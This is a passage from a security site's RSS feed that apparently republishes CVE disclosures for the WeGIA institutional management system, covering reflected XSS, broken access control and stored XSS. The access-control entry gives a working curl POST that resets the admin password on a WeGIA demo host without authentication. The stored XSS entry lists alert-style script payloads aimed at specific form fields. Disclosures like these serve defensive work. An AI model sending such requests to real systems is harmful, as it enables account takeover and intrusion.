	srcset=&amp;#34;/p/cve-2025-22143/401159443-ca95f575-8f7d-4402-97e2-b2ebfa90fa9b_hu_c37ba682c0d2617e.png 480w, /p/cve-2025-22143/401159443-ca95f575-8f7d-4402-97e2-b2ebfa90fa9b_hu_f23a6f8588915e57.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;145&amp;#34;
		data-flex-basis=&amp;#34;349px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; Reflected cross-site scripting (XSS) attacks can have serious consequences, including:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;User actions: Attackers can perform any action the user can, such as viewing, modifying, or initiating interactions with other users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data theft: Attackers can exfiltrate data or install malware on the user&amp;#39;s machine.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Account compromise: Attackers can manipulate or steal cookies, or compromise confidential information.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malicious code: Attackers can execute malicious code on the user&amp;#39;s system.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Business reputation damage: Attackers can deface a corporate website or spread misinformation.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirection: Attackers can change the instructions given to users, which can be dangerous if the target is a government website or provides vital resources.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-gxh2-8jxp-m59h&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-gxh2-8jxp-m59h&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 08 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2024-53473</title>
        <link>https://www.cvehunters.com/p/cve-2024-53473/</link>
        <guid>https://www.cvehunters.com/p/cve-2024-53473/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2024-53473-broken-access-control&amp;#34;&amp;gt;CVE-2024-53473: Broken Access Control
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2024-53473&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2024-53473&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;vendor&amp;#34;&amp;gt;Vendor
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. &amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;affected-product-code-base&amp;#34;&amp;gt;Affected Product Code Base
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;WeGIA &amp;amp;lt; v3.2.0&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;vulnerability-description&amp;#34;&amp;gt;Vulnerability Description
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A critical vulnerability was identified in the web application WeGIa. This vulnerability allows an attacker to change the password of the admin user by sending a POST request to the &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; endpoint without requiring authentication or authorization.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2024-53473-broken-access-control&amp;#34;&amp;gt;CVE-2024-53473: Broken Access Control
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2024-53473&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2024-53473&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;vendor&amp;#34;&amp;gt;Vendor
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. &amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;affected-product-code-base&amp;#34;&amp;gt;Affected Product Code Base
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;WeGIA &amp;amp;lt; v3.2.0&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;vulnerability-description&amp;#34;&amp;gt;Vulnerability Description
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A critical vulnerability was identified in the web application WeGIa. This vulnerability allows an attacker to change the password of the admin user by sending a POST request to the &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; endpoint without requiring authentication or authorization.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;burp-request&amp;#34;&amp;gt;Burp Request:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;https://github.com/user-attachments/assets/56fe1fdc-30c2-4cd3-9e30-ffc826f9f13b&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;image&amp;#34;
	
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;curl-request&amp;#34;&amp;gt;Curl Request:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;4
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-console&amp;#34; data-lang=&amp;#34;console&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;go&amp;#34;&amp;gt;curl -X POST https://demo.wegia.org/controle/control.php \
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;go&amp;#34;&amp;gt;  -H &amp;amp;#34;Content-Type: application/x-www-form-urlencoded&amp;amp;#34; \
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;go&amp;#34;&amp;gt;  -H &amp;amp;#34;Origin: https://demo.wegia.org&amp;amp;#34; \
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;go&amp;#34;&amp;gt;  --data-raw &amp;amp;#34;nova_senha=1234567&amp;amp;amp;confirmar_senha=1234567&amp;amp;amp;nomeClasse=FuncionarioControle&amp;amp;amp;metodo=alterarSenha&amp;amp;amp;redir=logout.php&amp;amp;amp;id_pessoa=1&amp;amp;amp;alterar=Alterar&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h2 id=&amp;#34;references&amp;#34;&amp;gt;References
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/nilsonLazarin/WeGIA/issues/791&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/nilsonLazarin/WeGIA/issues/791&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;discoverer&amp;#34;&amp;gt;Discoverer
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sat, 07 Dec 2024 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2024-53470</title>
        <link>https://www.cvehunters.com/p/cve-2024-53470/</link>
        <guid>https://www.cvehunters.com/p/cve-2024-53470/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2024-53470-stored-xss-in-gateway_pagamentophp-function&amp;#34;&amp;gt;CVE-2024-53470: Stored XSS in &amp;lt;code&amp;gt;gateway_pagamento.php&amp;lt;/code&amp;gt; function
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2024-53470&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2024-53470&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;vendor&amp;#34;&amp;gt;Vendor
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. &amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;affected-product-code-base&amp;#34;&amp;gt;Affected Product Code Base
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;WeGIA &amp;amp;lt; v3.2.0&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;vulnerability-description&amp;#34;&amp;gt;Vulnerability Description
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A stored Cross-Site Scripting (XSS) vulnerability was identified in the WeGIA application. This vulnerability allows unauthorized scripts to be executed within the user&amp;#39;s browser context. Stored XSS is particularly critical, as the malicious code is permanently stored on the server and executed whenever a compromised page is loaded, affecting all users accessing this page.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2024-53470-stored-xss-in-gateway_pagamentophp-function&amp;#34;&amp;gt;CVE-2024-53470: Stored XSS in &amp;lt;code&amp;gt;gateway_pagamento.php&amp;lt;/code&amp;gt; function
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2024-53470&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2024-53470&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;vendor&amp;#34;&amp;gt;Vendor
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. &amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;affected-product-code-base&amp;#34;&amp;gt;Affected Product Code Base
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;WeGIA &amp;amp;lt; v3.2.0&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;vulnerability-description&amp;#34;&amp;gt;Vulnerability Description
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A stored Cross-Site Scripting (XSS) vulnerability was identified in the WeGIA application. This vulnerability allows unauthorized scripts to be executed within the user&amp;#39;s browser context. Stored XSS is particularly critical, as the malicious code is permanently stored on the server and executed whenever a compromised page is loaded, affecting all users accessing this page.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;File: &amp;lt;code&amp;gt;gateway_pagamento.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Payload:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;Alert: XSS&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;);&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;Endpoint: &amp;lt;code&amp;gt;id=&amp;amp;quot;plataforma-endpoint&amp;amp;quot;&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;name=&amp;amp;quot;endpoint&amp;amp;quot;&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;https://github.com/user-attachments/assets/e671acdc-1ccf-49c5-9334-b105ddc4d97d&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;image&amp;#34;
	
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;File: &amp;lt;code&amp;gt;gateway_pagamento.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Payload:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;Alert: XSS2&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;);&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt; &amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;Endpoint: &amp;lt;code&amp;gt;id=&amp;amp;quot;plataforma-nome&amp;amp;quot;&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;name=&amp;amp;quot;nome&amp;amp;quot;&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;https://github.com/user-attachments/assets/a6d07283-288b-4db5-9258-d43361810f40&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;image&amp;#34;
	
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;File: &amp;lt;code&amp;gt;gateway_pagamento.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Payload:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
